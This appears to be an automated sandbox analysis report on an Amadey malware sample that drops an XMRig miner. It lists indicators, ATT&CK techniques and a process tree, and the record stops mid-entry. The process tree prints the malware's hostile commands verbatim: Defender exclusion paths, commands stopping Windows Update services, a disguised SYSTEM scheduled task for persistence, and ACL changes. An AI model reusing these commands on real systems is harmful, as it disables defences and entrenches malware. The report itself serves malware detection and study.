amadey | 4b9d1edaea936f67387f42846014802d768ee548af10116d09c2ae253a61cdbd

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ntlhost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	taskhostclp.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/memory/3732-339-0x00007FF623670000-0x00007FF623E5F000-memory.dmp	xmrig
behavioral2/memory/3732-343-0x00007FF623670000-0x00007FF623E5F000-memory.dmp	xmrig

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	rdpcllp.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	taskhostclp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	taskhostclp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ntlhost.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation	tmp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation	oneetx.exe

Executes dropped EXE 7 IoCs

pid	Process
2820	oneetx.exe
376	taskmask.exe
1960	rdpcllp.exe
4508	taskhostclp.exe
1052	oneetx.exe
1972	ntlhost.exe
4752	updater.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

VMProtect packed file 7 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral2/memory/2024-0-0x0000000000DF0000-0x0000000001445000-memory.dmp	vmprotect
behavioral2/files/0x00080000000231ec-7.dat	vmprotect
behavioral2/files/0x00080000000231ec-14.dat	vmprotect
behavioral2/memory/2820-15-0x0000000000B30000-0x0000000001185000-memory.dmp	vmprotect
behavioral2/files/0x00080000000231ec-18.dat	vmprotect
behavioral2/files/0x00080000000231ec-115.dat	vmprotect
behavioral2/memory/1052-139-0x0000000000B30000-0x0000000001185000-memory.dmp	vmprotect

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"	taskhostclp.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	taskhostclp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ntlhost.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4508	taskhostclp.exe
1972	ntlhost.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 376 set thread context of 3316	376	taskmask.exe	104
PID 4752 set thread context of 5004	4752	updater.exe	151
PID 4752 set thread context of 3732	4752	updater.exe	152

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	rdpcllp.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4996	sc.exe
5052	sc.exe
3716	sc.exe
4216	sc.exe
648	sc.exe
2304	sc.exe
3372	sc.exe
1916	sc.exe
1340	sc.exe
3980	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
4836	schtasks.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	71	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1960	rdpcllp.exe
1960	rdpcllp.exe
3316	vbc.exe
3316	vbc.exe
3316	vbc.exe
3316	vbc.exe
3316	vbc.exe
1960	rdpcllp.exe
1960	rdpcllp.exe
5012	powershell.exe
5012	powershell.exe
5012	powershell.exe
1960	rdpcllp.exe
1960	rdpcllp.exe
1960	rdpcllp.exe
1960	rdpcllp.exe
1960	rdpcllp.exe
1960	rdpcllp.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
1960	rdpcllp.exe
1960	rdpcllp.exe
4752	updater.exe
4752	updater.exe
4752	updater.exe
4752	updater.exe
5036	powershell.exe
5036	powershell.exe
4752	updater.exe
4752	updater.exe
4752	updater.exe
4752	updater.exe
4752	updater.exe
4752	updater.exe
4508	powershell.exe
4508	powershell.exe
4752	updater.exe
4752	updater.exe
4752	updater.exe
4752	updater.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe
3732	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
664	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3316	vbc.exe
Token: SeDebugPrivilege	5012	powershell.exe
Token: SeShutdownPrivilege	4812	powercfg.exe
Token: SeCreatePagefilePrivilege	4812	powercfg.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeShutdownPrivilege	1844	powercfg.exe
Token: SeCreatePagefilePrivilege	1844	powercfg.exe
Token: SeShutdownPrivilege	492	powercfg.exe
Token: SeCreatePagefilePrivilege	492	powercfg.exe
Token: SeShutdownPrivilege	4516	powercfg.exe
Token: SeCreatePagefilePrivilege	4516	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4656	powershell.exe
Token: SeSecurityPrivilege	4656	powershell.exe
Token: SeTakeOwnershipPrivilege	4656	powershell.exe
Token: SeLoadDriverPrivilege	4656	powershell.exe
Token: SeSystemProfilePrivilege	4656	powershell.exe
Token: SeSystemtimePrivilege	4656	powershell.exe
Token: SeProfSingleProcessPrivilege	4656	powershell.exe
Token: SeIncBasePriorityPrivilege	4656	powershell.exe
Token: SeCreatePagefilePrivilege	4656	powershell.exe
Token: SeBackupPrivilege	4656	powershell.exe
Token: SeRestorePrivilege	4656	powershell.exe
Token: SeShutdownPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeSystemEnvironmentPrivilege	4656	powershell.exe
Token: SeRemoteShutdownPrivilege	4656	powershell.exe
Token: SeUndockPrivilege	4656	powershell.exe
Token: SeManageVolumePrivilege	4656	powershell.exe
Token: 33	4656	powershell.exe
Token: 34	4656	powershell.exe
Token: 35	4656	powershell.exe
Token: 36	4656	powershell.exe
Token: SeIncreaseQuotaPrivilege	4656	powershell.exe
Token: SeSecurityPrivilege	4656	powershell.exe
Token: SeTakeOwnershipPrivilege	4656	powershell.exe
Token: SeLoadDriverPrivilege	4656	powershell.exe
Token: SeSystemProfilePrivilege	4656	powershell.exe
Token: SeSystemtimePrivilege	4656	powershell.exe
Token: SeProfSingleProcessPrivilege	4656	powershell.exe
Token: SeIncBasePriorityPrivilege	4656	powershell.exe
Token: SeCreatePagefilePrivilege	4656	powershell.exe
Token: SeBackupPrivilege	4656	powershell.exe
Token: SeRestorePrivilege	4656	powershell.exe
Token: SeShutdownPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeSystemEnvironmentPrivilege	4656	powershell.exe
Token: SeRemoteShutdownPrivilege	4656	powershell.exe
Token: SeUndockPrivilege	4656	powershell.exe
Token: SeManageVolumePrivilege	4656	powershell.exe
Token: 33	4656	powershell.exe
Token: 34	4656	powershell.exe
Token: 35	4656	powershell.exe
Token: 36	4656	powershell.exe
Token: SeIncreaseQuotaPrivilege	4656	powershell.exe
Token: SeSecurityPrivilege	4656	powershell.exe
Token: SeTakeOwnershipPrivilege	4656	powershell.exe
Token: SeLoadDriverPrivilege	4656	powershell.exe
Token: SeSystemProfilePrivilege	4656	powershell.exe
Token: SeSystemtimePrivilege	4656	powershell.exe
Token: SeProfSingleProcessPrivilege	4656	powershell.exe
Token: SeIncBasePriorityPrivilege	4656	powershell.exe
Token: SeCreatePagefilePrivilege	4656	powershell.exe
Token: SeBackupPrivilege	4656	powershell.exe
Token: SeRestorePrivilege	4656	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2024	tmp.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2024 wrote to memory of 2820	2024	tmp.exe	86
PID 2024 wrote to memory of 2820	2024	tmp.exe	86
PID 2024 wrote to memory of 2820	2024	tmp.exe	86
PID 2820 wrote to memory of 4836	2820	oneetx.exe	88
PID 2820 wrote to memory of 4836	2820	oneetx.exe	88
PID 2820 wrote to memory of 4836	2820	oneetx.exe	88
PID 2820 wrote to memory of 4940	2820	oneetx.exe	90
PID 2820 wrote to memory of 4940	2820	oneetx.exe	90
PID 2820 wrote to memory of 4940	2820	oneetx.exe	90
PID 4940 wrote to memory of 3096	4940	cmd.exe	93
PID 4940 wrote to memory of 3096	4940	cmd.exe	93
PID 4940 wrote to memory of 3096	4940	cmd.exe	93
PID 4940 wrote to memory of 4704	4940	cmd.exe	94
PID 4940 wrote to memory of 4704	4940	cmd.exe	94
PID 4940 wrote to memory of 4704	4940	cmd.exe	94
PID 4940 wrote to memory of 4572	4940	cmd.exe	95
PID 4940 wrote to memory of 4572	4940	cmd.exe	95
PID 4940 wrote to memory of 4572	4940	cmd.exe	95
PID 4940 wrote to memory of 4356	4940	cmd.exe	97
PID 4940 wrote to memory of 4356	4940	cmd.exe	97
PID 4940 wrote to memory of 4356	4940	cmd.exe	97
PID 4940 wrote to memory of 1376	4940	cmd.exe	96
PID 4940 wrote to memory of 1376	4940	cmd.exe	96
PID 4940 wrote to memory of 1376	4940	cmd.exe	96
PID 4940 wrote to memory of 1972	4940	cmd.exe	98
PID 4940 wrote to memory of 1972	4940	cmd.exe	98
PID 4940 wrote to memory of 1972	4940	cmd.exe	98
PID 2820 wrote to memory of 376	2820	oneetx.exe	103
PID 2820 wrote to memory of 376	2820	oneetx.exe	103
PID 2820 wrote to memory of 376	2820	oneetx.exe	103
PID 376 wrote to memory of 3316	376	taskmask.exe	104
PID 376 wrote to memory of 3316	376	taskmask.exe	104
PID 376 wrote to memory of 3316	376	taskmask.exe	104
PID 376 wrote to memory of 3316	376	taskmask.exe	104
PID 376 wrote to memory of 3316	376	taskmask.exe	104
PID 2820 wrote to memory of 1960	2820	oneetx.exe	106
PID 2820 wrote to memory of 1960	2820	oneetx.exe	106
PID 2820 wrote to memory of 4508	2820	oneetx.exe	108
PID 2820 wrote to memory of 4508	2820	oneetx.exe	108
PID 2540 wrote to memory of 3716	2540	cmd.exe	118
PID 2540 wrote to memory of 3716	2540	cmd.exe	118
PID 2540 wrote to memory of 3372	2540	cmd.exe	119
PID 2540 wrote to memory of 3372	2540	cmd.exe	119
PID 2540 wrote to memory of 1916	2540	cmd.exe	120
PID 2540 wrote to memory of 1916	2540	cmd.exe	120
PID 2540 wrote to memory of 4216	2540	cmd.exe	121
PID 2540 wrote to memory of 4216	2540	cmd.exe	121
PID 2540 wrote to memory of 648	2540	cmd.exe	122
PID 2540 wrote to memory of 648	2540	cmd.exe	122
PID 4420 wrote to memory of 4812	4420	cmd.exe	127
PID 4420 wrote to memory of 4812	4420	cmd.exe	127
PID 4508 wrote to memory of 1972	4508	taskhostclp.exe	112
PID 4508 wrote to memory of 1972	4508	taskhostclp.exe	112
PID 4420 wrote to memory of 1844	4420	cmd.exe	128
PID 4420 wrote to memory of 1844	4420	cmd.exe	128
PID 4420 wrote to memory of 492	4420	cmd.exe	129
PID 4420 wrote to memory of 492	4420	cmd.exe	129
PID 4420 wrote to memory of 4516	4420	cmd.exe	130
PID 4420 wrote to memory of 4516	4420	cmd.exe	130
PID 4216 wrote to memory of 1340	4216	cmd.exe	138
PID 4216 wrote to memory of 1340	4216	cmd.exe	138
PID 4216 wrote to memory of 2304	4216	cmd.exe	139
PID 4216 wrote to memory of 2304	4216	cmd.exe	139
PID 4216 wrote to memory of 4996	4216	cmd.exe	140

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3168
- C:\Users\Admin\AppData\Local\Temp\tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
    "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2820
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:4836
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4940
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:3096
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:N"
        5⤵
        
        PID:4704
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:R" /E
        5⤵
        
        PID:4572
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\eb0f58bce7" /P "Admin:N"
        5⤵
        
        PID:1376
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:4356
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\eb0f58bce7" /P "Admin:R" /E
        5⤵
        
        PID:1972
  - - C:\Users\Admin\AppData\Local\Temp\1000152001\taskmask.exe
      "C:\Users\Admin\AppData\Local\Temp\1000152001\taskmask.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:376
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3316
  - - C:\Users\Admin\AppData\Local\Temp\1000153101\rdpcllp.exe
      "C:\Users\Admin\AppData\Local\Temp\1000153101\rdpcllp.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in Drivers directory
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      PID:1960
  - - C:\Users\Admin\AppData\Local\Temp\1000154001\taskhostclp.exe
      "C:\Users\Admin\AppData\Local\Temp\1000154001\taskhostclp.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of WriteProcessMemory
      PID:4508
    - - C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
        
        C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5012
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2540
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3716
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3372
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1916
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4216
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4656
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4420
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4812
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1844
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:492
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4516
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:4392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:5036
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4216
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1340
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2304
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4996
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5052
- - C:\Windows\System32\sc.exe
